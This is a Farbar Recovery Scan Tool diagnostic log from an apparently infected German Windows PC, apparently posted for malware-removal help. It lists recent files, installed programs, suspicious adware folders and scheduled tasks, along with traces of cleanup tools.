2014-12-06 08:40 - 2014-12-06 08:50 - 00003570 _____ () C:\Users\finja\Desktop\Rkill.txt
2014-12-06 08:39 - 2014-12-06 08:39 - 01944824 _____ (Bleeping Computer, LLC) C:\Users\finja\Downloads\rkill.exe
2014-12-05 21:51 - 2014-12-06 16:19 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-12-05 21:51 - 2014-12-05 21:53 - 00000901 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-12-05 21:53 - 00000000 ____D () C:\Program Files\ Malwarebytes Anti-Malware 
2014-12-05 21:50 - 2014-11-21 06:14 - 00075480 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-12-05 21:50 - 2014-11-21 06:14 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-12-05 21:07 - 2014-12-06 15:35 - 00000110 _____ () C:\AdwCleanerDebug.txt
2014-12-05 21:04 - 2014-12-05 21:04 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-12-05 20:49 - 2014-12-05 20:49 - 00035992 _____ () C:\Windows\system32\Drivers\hitmanpro37.sys
2014-12-05 20:32 - 2014-12-05 20:32 - 00011842 _____ () C:\Windows\system32\.crusader
2014-12-05 20:01 - 2014-12-05 20:32 - 00000000 ____D () C:\Users\finja\AppData\Local\gnuutilityUI
2014-12-05 20:01 - 2014-12-05 20:02 - 00000000 ____D () C:\Windows\system32\guicca32
2014-12-05 19:40 - 2014-12-05 19:40 - 263670483 _____ () C:\Windows\MEMORY.DMP
2014-12-05 19:40 - 2014-12-05 19:40 - 00145784 _____ () C:\Windows\Minidump\Mini120514-01.dmp
2014-12-05 19:39 - 2014-12-05 19:39 - 00000000 ____D () C:\Temp
2014-12-05 13:33 - 2014-12-05 20:08 - 00000000 ____D () C:\ProgramData\HitmanPro
2014-12-04 20:43 - 2014-12-04 20:43 - 00000000 ____D () C:\Users\finja\AppData\Local\Microsoft Corporation
2014-12-03 19:45 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\ZorkoKcesd
2014-12-02 19:37 - 2014-12-02 19:37 - 00000000 ____D () C:\Windows\system32\utilitylocalspl_86
2014-12-02 19:34 - 2014-12-02 19:34 - 00000000 ____D () C:\Windows\system32\scrollingwin32Prot
2014-12-01 11:06 - 2014-12-06 15:37 - 00000000 ___HD () C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}
2014-12-01 11:06 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\EedtaWbezm
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WEB.DE MailCheck
2014-11-29 20:02 - 2014-11-29 20:02 - 00000000 ____D () C:\Program Files\WEB.DE MailCheck
2014-11-28 20:51 - 2014-11-28 20:51 - 00000000 ____D () C:\ProgramData\UUdb
2014-11-27 22:42 - 2014-11-27 22:42 - 00000000 ____D () C:\Program Files\Microsoft ATS
2014-11-27 22:33 - 2014-11-27 22:33 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall (1).exe
2014-11-27 22:31 - 2014-11-27 22:31 - 11473216 _____ (Microsoft Corporation) C:\Users\finja\Downloads\mseinstall.exe
2014-11-27 22:23 - 2014-11-27 22:23 - 00001998 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00001986 _____ () C:\Users\Public\Desktop\Windows 7 Upgrade Advisor.lnk
2014-11-27 22:23 - 2014-11-27 22:23 - 00000000 ____D () C:\Program Files\Microsoft Windows 7 Upgrade Advisor
2014-11-27 21:25 - 2014-11-27 21:25 - 00000000 ____D () C:\Windows\system32\DesktopMBRText
2014-11-25 15:33 - 2014-12-05 20:32 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-11-19 21:31 - 2014-10-24 02:03 - 00499200 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2014-11-13 14:27 - 2014-11-13 14:27 - 00000951 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2014-11-13 13:30 - 2014-11-13 13:30 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-13 13:25 - 2014-11-13 13:25 - 00000000 ____D () C:\Windows\ERUNT
2014-11-13 13:15 - 2014-12-06 15:37 - 00000000 ____D () C:\AdwCleaner
2014-11-13 12:54 - 2014-12-05 13:56 - 00001356 _____ () C:\Users\finja\AppData\Local\d3d9caps.dat
2014-11-12 23:01 - 2014-10-10 02:01 - 00449536 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 01259008 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2014-11-12 23:01 - 2014-10-10 02:00 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2014-11-12 23:01 - 2014-10-10 00:22 - 00619520 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2014-11-12 22:59 - 2014-09-19 01:50 - 00278528 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-11-12 22:59 - 2014-08-27 01:55 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\msxml3r.dll
2014-11-12 22:56 - 2014-08-12 03:25 - 00729600 _____ (Microsoft Corporation) C:\Windows\system32\IMJP10K.DLL
2014-11-12 22:53 - 2014-10-18 02:08 - 00564224 _____ (Microsoft Corporation) C:\Windows\system32\oleaut32.dll
2014-11-12 22:53 - 2014-10-03 02:18 - 00274432 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00396800 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-11-12 22:53 - 2014-10-03 02:17 - 00170496 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-11-12 07:47 - 2014-10-24 02:04 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-11-12 07:45 - 2014-10-13 00:34 - 02054656 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-11-11 22:20 - 2014-10-27 20:10 - 12366848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-11 22:20 - 2014-10-27 20:05 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-11-11 22:20 - 2014-10-27 20:02 - 09739776 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01139712 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-11-11 22:20 - 2014-10-27 19:59 - 01129472 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-11-11 22:20 - 2014-10-27 19:58 - 01427968 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-11-11 22:20 - 2014-10-27 19:57 - 00231936 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-11-11 22:20 - 2014-10-27 19:57 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 01802752 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00717824 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00421376 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-11-11 22:20 - 2014-10-27 19:56 - 00142848 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-11 22:20 - 2014-10-27 19:55 - 00353792 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00073216 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00041472 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-11-11 22:20 - 2014-10-27 19:55 - 00011776 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-11-11 22:20 - 2014-10-27 19:55 - 00010752 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-11-11 22:20 - 2014-10-27 19:54 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-11-11 08:42 - 2014-11-11 08:42 - 00000000 ____D () C:\Users\finja\AppData\Roaming\AdvancedSystemProtector
2014-11-11 08:40 - 2014-12-06 16:09 - 00001340 _____ () C:\Windows\Tasks\XPGILDE.job
2014-11-11 08:39 - 2014-12-06 16:09 - 00001684 _____ () C:\Windows\Tasks\MQZDOUD.job
2014-11-11 08:33 - 2014-11-11 08:36 - 01057112 _____ (Installer Setup ) C:\Users\finja\Downloads\installer_java_German.exe
2014-11-10 21:27 - 2014-12-05 19:40 - 00000000 ____D () C:\Windows\Minidump
2014-11-08 21:59 - 2014-12-05 22:17 - 00000000 ____D () C:\ProgramData\7bb6df21-8ca8-4eec-965d-8cd2261544c7
2014-11-06 21:02 - 2014-11-06 21:02 - 00000000 ____D () C:\Users\finja\AppData\Local\Macromedia
2014-11-06 20:47 - 2014-11-13 12:44 - 00000000 ____D () C:\ProgramData\boost_interprocess
2014-11-06 20:30 - 2014-11-06 20:30 - 00000003 _____ () C:\Users\finja\Downloads\C

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-12-06 16:20 - 2009-02-27 09:31 - 01209056 _____ () C:\Windows\WindowsUpdate.log
2014-12-06 16:09 - 2014-06-08 13:02 - 00140398 _____ () C:\Windows\PFRO.log
2014-12-06 16:09 - 2013-11-26 19:43 - 00000000 ____D () C:\Windows\TempDF28D6CC-3D1E-B803-1F4F-B4B1FD7BEC31-Signatures
2014-12-06 16:09 - 2009-02-27 10:20 - 00000000 _____ () C:\Windows\system32\LogConfigTemp.xml
2014-12-06 16:09 - 2006-11-02 14:01 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-12-06 16:09 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-12-06 16:09 - 2006-11-02 13:47 - 00003216 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-12-06 16:08 - 2006-11-02 14:01 - 00032560 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-12-06 10:43 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\PLA
2014-12-06 09:18 - 2009-05-16 15:26 - 00000000 ____D () C:\Users\finja
2014-12-05 22:17 - 2014-10-28 11:28 - 00000000 ____D () C:\ProgramData\83b32e09-56dd-4d15-bbc7-350e8627ec65
2014-12-05 21:41 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\LogFiles
2014-12-05 20:49 - 2014-11-02 19:50 - 00000000 ____D () C:\Windows\system32\JREMetafilePublic
2014-12-05 13:34 - 2008-01-21 08:16 - 01598580 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-11-28 20:51 - 2011-04-11 19:26 - 00000000 ____D () C:\Program Files\1und1Softwareaktualisierung
2014-11-26 18:48 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Roaming\Macromedia
2014-11-26 18:28 - 2008-08-15 00:15 - 00000000 ____D () C:\ProgramData\Adobe
2014-11-13 14:30 - 2014-11-04 07:52 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-11-13 14:29 - 2008-08-15 00:11 - 00000000 ____D () C:\Program Files\Google
2014-11-13 14:27 - 2009-05-16 15:28 - 00000000 ____D () C:\Users\finja\AppData\Local\Google
2014-11-13 14:25 - 2014-11-04 07:59 - 00000000 ____D () C:\Program Files\F978377C-B7D4-4536-8E10-14CA97B13394
2014-11-13 13:55 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\rescache
2014-11-13 13:46 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-11-13 13:18 - 2011-04-11 19:27 - 00000885 _____ () C:\Users\finja\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WEB.DE.lnk
2014-11-12 23:04 - 2006-11-02 12:18 - 00000000 ____D () C:\Windows\system32\de-DE
2014-11-12 23:01 - 2008-08-15 00:16 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-11-12 22:52 - 2013-08-02 19:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-11-12 22:47 - 2014-06-04 20:19 - 00000106 _____ () C:\Users\finja\AppData\Roaming\WB.CFG
2014-11-12 22:39 - 2006-11-02 11:24 - 100445232 _____ (Microsoft Corporation) C:\Windows\system32\mrt.exe
2014-11-12 22:27 - 2006-11-02 11:23 - 00000321 _____ () C:\Windows\win.ini
2014-11-12 14:45 - 2006-11-02 13:47 - 00393944 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-11-08 21:15 - 2014-11-02 19:57 - 00000000 ___HD () C:\Users\Public\Temp
2014-11-06 20:56 - 2014-11-02 19:50 - 00000000 ____D () C:\Program Files\Free Flash Plugin
2014-11-06 20:49 - 2012-08-10 17:12 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerApp.exe
2014-11-06 20:49 - 2011-12-26 19:46 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\system32\FlashPlayerCPLApp.cpl
2014-11-06 20:49 - 2009-05-16 16:07 - 00000000 ____D () C:\Users\finja\AppData\Local\Adobe

Files to move or delete:
====================
C:\Users\finja\remove.exe


Some content of TEMP:
====================
C:\Users\finja\AppData\Local\Temp\Quarantine.exe
C:\Users\finja\AppData\Local\Temp\sqlite3.dll


==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2014-12-06 16:22

==================== End Of Log ============================
         
--- --- ---


Addition:
Code:
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 03-12-2014
Ran by finja at 2014-12-06 16:32:02
Running from C:\Users\finja\Desktop
Boot Mode: Normal
==========================================================


==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Microsoft Security Essentials (Enabled - Up to date) {4F35CFC4-45A3-FC37-EF17-759A02E39AB1}
AS: Microsoft Security Essentials (Enabled - Up to date) {F4542E20-6399-F3B9-D5A7-4EE87964D00C}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

32 Bit HP CIO Components Installer (Version: 6.1.2 - Hewlett-Packard) Hidden
Activation Assistant for the 2007 Microsoft Office suites (HKLM\...\Activation Assistant for the 2007 Microsoft Office suites) (Version:  - Microsoft Corporation)
Activation Assistant for the 2007 Microsoft Office suites (Version: 1.0 - Microsoft Corporation) Hidden
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.3.0.3650 - Adobe Systems Incorporated)
Adobe Flash Player 15 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.189 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) - Deutsch (HKLM\...\{AC76BA86-7AD7-1031-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: Version 7.0.1101.18 - Alps Electric)
Bookworm Deluxe (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110113233}) (Version:  - Oberon Media)
Bricks of Egypt (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11029123}) (Version:  - Oberon Media)
Build-a-lot (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113537610}) (Version:  - Oberon Media)
Cake Mania (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111199750}) (Version:  - Oberon Media)
Chuzzle (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110411970}) (Version:  - Oberon Media)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
Diner Dash (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-110305887}) (Version:  - Oberon Media)
DJ_AIO_06_F4500_SW_MIN (Version: 140.0.690.000 - Hewlett-Packard) Hidden
Dream Day First Home (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113832110}) (Version:  - Oberon Media)
eDeals version 1.0 (HKLM\...\eDeals_is1) (Version: 1.0 - eDeals)
eMachines (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-11019760}) (Version:  - Oberon Media)
eMachines Recovery Management (HKLM\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 3.1.3003 - Acer Incorporated)
eMachines ScreenSaver (HKLM\...\{79DD56FC-DB8B-47F5-9C80-78B62E05F9BC}) (Version: 1.02.0902 - Acer Incorporated)
Galapago (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111307457}) (Version:  - Oberon Media)
Garmin BaseCamp (HKLM\...\{7C69F731-6471-48FE-899B-1C40F80042C7}) (Version: 4.4.2 - Garmin Ltd or its subsidiaries)
Garmin City Navigator Europe NT 2012.20 Update (HKLM\...\{6D3A83A6-8F72-4354-A80D-721D1E54FC76}) (Version: 15.20.0.0 - Garmin Ltd or its subsidiaries)
Garmin USB Drivers (HKLM\...\{ABA5E381-EC46-425C-86C5-5CD15BBFB4BF}) (Version: 2.3.1.0 - Garmin Ltd or its subsidiaries)
GearDrvs (Version: 1.00.0000 - GEAR Software) Hidden
HP Deskjet F4500 All-in-One Driver 14.0 Rel. 6 (HKLM\...\{0AFFEA39-60AF-4C4F-BB47-4A1F7CB12129}) (Version: 14.0 - HP)
Intel(R) Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version:  - Intel Corporation)
InterVideo WinDVD 8 (HKLM\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0-B9.498 - InterVideo Inc.)
InterVideo WinDVD 8 (Version: 8.0-B9.498 - InterVideo Inc.) Hidden
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Konz 2013 (HKLM\...\InstallShield_{76651FD7-2B71-4B61-9F3A-E82F52F08D92}) (Version: 1.00.0000 - USM)
Konz 2013 (Version: 1.00.0000 - USM) Hidden
Launch Manager (HKLM\...\LManager) (Version:  - )
LightScribe  1.4.142.1 (Version: 1.4.142.1 - hxxp://www.lightscribe.com) Hidden
Luxor (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111265347}) (Version:  - Oberon Media)
Mahjong Escape Ancient China (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-111252743}) (Version:  - Oberon Media)
Malwarebytes Anti-Malware Version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Mesh Runtime (Version: 15.4.5722.2 - Microsoft Corporation) Hidden
Messenger Companion (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Microsoft .NET Framework 3.5 Language Pack SP1 - DEU (HKLM\...\Microsoft .NET Framework 3.5 Language Pack SP1 - deu) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 3.5 SP1 (HKLM\...\Microsoft .NET Framework 3.5 SP1) (Version:  - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Automated Troubleshooting Services Shim (HKLM\...\{c9920352-04e6-469d-bab8-e2b9c7c75415}.sdb) (Version:  - )
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Outlook Connector (HKLM\...\{95140000-007A-0407-0000-0000000FF1CE}) (Version: 14.0.5118.5000 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.6.305.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM\...\{4EA2F95F-A537-4d17-9E7F-6B3FF8D9BBE3}) (Version: 08.05.0822 - Microsoft Corporation)
MSVCRT (Version: 15.4.2862.0708 - Microsoft) Hidden
myphotobook.de (HKLM\...\de.myphotobook.creator.001F9DF2D0BAABEB11F42CCEE43224607B61109C.1) (Version: 1.4.3 - myphotobook GmbH)
myphotobook.de (Version: 1.4.3 - myphotobook GmbH) Hidden
Network (Version: 140.0.215.000 - Hewlett-Packard) Hidden
NTI Media Maker 8 (HKLM\...\InstallShield_{2413930C-8309-47A6-BC61-5EF27A4222BC}) (Version: 8.0.12.6325 - NewTech Infosystems)
NTI Media Maker 8 (Version: 8.0.12.6325 - NewTech Infosystems) Hidden
Ravensburger tiptoi (HKLM\...\Ravensburger tiptoi) (Version:  - )
Scan (Version: 140.0.80.000 - Hewlett-Packard) Hidden
Segoe UI (Version: 15.4.2271.0615 - Microsoft Corp) Hidden
Steuer 2012 (HKU\S-1-5-21-717213786-2690546565-922636609-1000\...\{01159E8A-44F7-4885-A7F9-872CE4D74063}) (Version: 20.00.8137 - Buhl Data Service GmbH)
Toolbox (Version: 140.0.428.000 - Hewlett-Packard) Hidden
Turbo Pizza (HKLM\...\{82C36957-D2B8-4EF2-B88C-5FA03AA848C7-113009953}) (Version:  - Oberon Media)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_ENTERPRISE_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Excel 2007 Help (KB963678) (HKLM\...\{90120000-0016-0407-0000-0000000FF1CE}_HOMESTUDENTR_{BEC163EC-7A83-48A1-BFB6-3BF47CC2F8CF}) (Version:  - Microsoft)
Update für Microsoft Office Outlook 2007 Help (KB963677) (HKLM\...\{90120000-001A-0407-0000-0000000FF1CE}_ENTERPRISE_{F6828576-6F79-470D-AB50-69D1BBADBD30}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_ENTERPRISE_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Powerpoint 2007 Help (KB963669) (HKLM\...\{90120000-0018-0407-0000-0000000FF1CE}_HOMESTUDENTR_{EA160DA3-E9B5-4D03-A518-21D306665B96}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_ENTERPRISE_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
Update für Microsoft Office Word 2007 Help (KB963665) (HKLM\...\{90120000-001B-0407-0000-0000000FF1CE}_HOMESTUDENTR_{38472199-D7B6-4833-A949-10E4EE6365A1}) (Version:  - Microsoft)
WEB.DE Desktop Icons (HKLM\...\1&1 Mail & Media GmbH 1und1DesktopIconsInstaller) (Version: 3.0.5.0 - 1&1 Mail & Media GmbH)
WEB.DE MailCheck für Internet Explorer (HKLM\...\1&1 Mail & Media GmbH Toolbar IE8) (Version: 2.6.0.4 - 1&1 Mail & Media GmbH)
WEB.DE Softwareaktualisierung (HKLM\...\1&1 Mail & Media GmbH 1und1Softwareaktualisierung) (Version: 3.0.1.0 - 1&1 Mail & Media GmbH)
Windows 7 Upgrade Advisor (HKLM\...\{9A4D182C-35C7-4791-8484-4304EBC9101A}) (Version: 2.0.5000.0 - Microsoft Corporation)
Windows Driver Package - Garmin (grmnusb) GARMIN Devices  (04/19/2012 2.3.1.0) (HKLM\...\98157A226B40B173301B0F53C8E98C47805D5152) (Version: 04/19/2012 2.3.1.0 - Garmin)
Windows Live Essentials (HKLM\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)
Windows Live Mesh ActiveX control for remote connections (HKLM\...\{C5398A89-516C-4DAF-BA07-EE7949090E56}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{5D39BBA0-67EE-42FE-8640-57C456AE4C8A}\InprocServer32 -> C:\Users\finja\AppData\LocalLow\WiseConvert_1.3_B2\prxtbWis0.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{66E8DCC7-97D2-4A89-8E08-D0610FF0878C}\InprocServer32 -> C:\Users\finja\AppData\Local\Conduit\Community Alerts\Alert.dll No File
CustomCLSID: HKU\S-1-5-21-717213786-2690546565-922636609-1000_Classes\CLSID\{F9E1BD9A-84B5-4D12-9195-0B3E7D86FD35}\InprocServer32 -> C:\ProgramData\{CA2FACF7-9029-4A21-892B-E7F60B39FF1A}\actxprxy.dll No File

==================== Restore Points  =========================

05-12-2014 19:07:39 Prüfpunkt von HitmanPro
05-12-2014 19:31:46 Prüfpunkt von HitmanPro

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

